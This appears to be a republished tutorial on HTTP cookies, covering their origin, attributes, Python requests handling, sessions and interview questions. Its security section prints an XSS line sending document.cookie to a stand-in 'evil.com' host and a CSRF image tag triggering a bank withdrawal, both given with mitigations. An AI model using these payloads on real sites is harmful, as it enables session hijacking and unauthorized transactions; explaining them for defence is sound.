Fundamentals 14 min read

Mastering Web Cookies: From Basics to Python Manipulation

This article explains the origin, purpose, and inner workings of HTTP cookies, details their attributes and security implications, demonstrates how to create, retrieve, and set cookies with Python's requests library, and compares cookies with server‑side sessions for robust web development.

MaGe Linux Operations
MaGe Linux Operations
MaGe Linux Operations
Mastering Web Cookies: From Basics to Python Manipulation

In a previous tutorial on a Youku bullet‑screen crawler we briefly mentioned cookies; this article provides a comprehensive overview of cookies (small data files) and related concepts.

1. Birth Background

HTTP is stateless, meaning the server cannot identify whether two requests come from the same browser. As the web evolved toward interactive applications, developers needed a way to remember user actions, leading to hidden fields and eventually to cookies.

Hidden field example: <input type="hidden" name="field_name" value="value">

In 1994, Lou Montulli at Netscape introduced cookies to store shopping‑cart history, and browsers gradually adopted the feature.

2. What Is a Cookie

A cookie is a piece of information sent by the server to the client and stored as a text file on the client. The browser includes the cookie in subsequent requests, allowing the server to track client state.

Cookies are mainly used for:

Session state management (e.g., login status, shopping cart, game scores).

Personalized settings (e.g., user preferences, themes).

Browser behavior tracking (e.g., analytics).

3. Cookie Principle

When a user logs in, the server validates credentials and returns a Set‑Cookie header. The browser saves the cookie and sends it back in the Cookie header on later requests.

HTTP/1.1 200 OK
Content-type: text/html
Set-Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15 Aug 2019 21:47:38 GMT; Path=/; Domain=.example.com; HttpOnly

Subsequent request example:

GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: user_cookie=Rg3vHJZnehYLjVg7qi3bZjzg

The server reads the cookie to identify the user, confirming that the user is logged in. Note that cookies are stored client‑side and can be modified, which poses security risks.

4. Cookie Attributes

A cookie consists of several attributes such as Name, Value, Domain, Path, Expires/Max‑Age, Size, HttpOnly, and Secure, each controlling its behavior.

1. Name & Value

The Name identifies the cookie; the server uses it to retrieve the corresponding Value.

2. Domain & Path

Domain restricts which hosts can access the cookie (e.g., .baidu.com vs. .tieba.baidu.com). Path limits the URL paths that can read the cookie (e.g., /test).

3. Expires/Max‑Age

Defines the cookie’s lifetime. Without a value, the cookie expires with the browser session.

4. Size

Represents the total character count of the name and value (e.g., id=666 has size 5).

5. HttpOnly

When true, the cookie is sent only in HTTP headers and cannot be accessed via document.cookie, helping mitigate XSS attacks.

6. Secure

When set, the cookie is transmitted only over HTTPS.

5. Python Operations on Cookies

1. Generating Cookies

After successful authentication, the server can set a cookie in the response header; the browser stores it automatically.

2. Retrieving Cookies

Using the requests library, r.cookies returns all cookies, and r.cookies.get_dict() provides them as a dictionary.

3. Setting Cookies

When crawling, you can copy the browser’s cookie string into a requests session to impersonate a logged‑in user.

6. Session

1. Birth Background

Because cookies are client‑side, visible, and modifiable, sessions were introduced to store user data securely on the server while using a cookie only for the session identifier.

2. What Is a Session

A session is a server‑side object identified by a session ID, which the server sends to the client as a cookie. The session persists until the user logs out or it times out.

Session workflow:

The first request creates a session and returns a session ID cookie.

Subsequent requests include the session ID, allowing the server to retrieve the stored data.

Sessions can be implemented via cookies or URL rewriting; the cookie method is illustrated in the diagram.

7. Interview Scenarios

1. Cookie vs. Session

Both enable client‑server interaction.

Cookies reside client‑side, are easy to forge, and less secure.

Sessions reside server‑side, consuming server resources.

Session implementation can use cookies or URL rewriting.

2. Security Issues Caused by Cookies

Session hijacking and XSS: attackers steal cookies to impersonate users. Example exploit:

(new Image()).src = "http://evil.com/steal-cookie.php?cookie=" + document.cookie;

HttpOnly cookies mitigate this.

CSRF: malicious requests triggered by a logged‑in user’s cookie. Example:

<img src="http://bank.example.com/withdraw?account=bob&amount=1000000">

. Mitigations include hidden fields, confirmation steps, and short cookie lifetimes.

8. Summary

The article covered the fundamentals of cookies, their attributes, security considerations, how to manipulate them with Python’s requests library, and the relationship between cookies and server‑side sessions, providing a solid foundation for web crawling and web development.

Original Source

Signed-in readers can open the original source through BestHub's protected redirect.

Sign in to view source
Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactadmin@besthub.devand we will review it promptly.

SecurityHTTPSessionweb fundamentals
MaGe Linux Operations
Written by

MaGe Linux Operations

Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.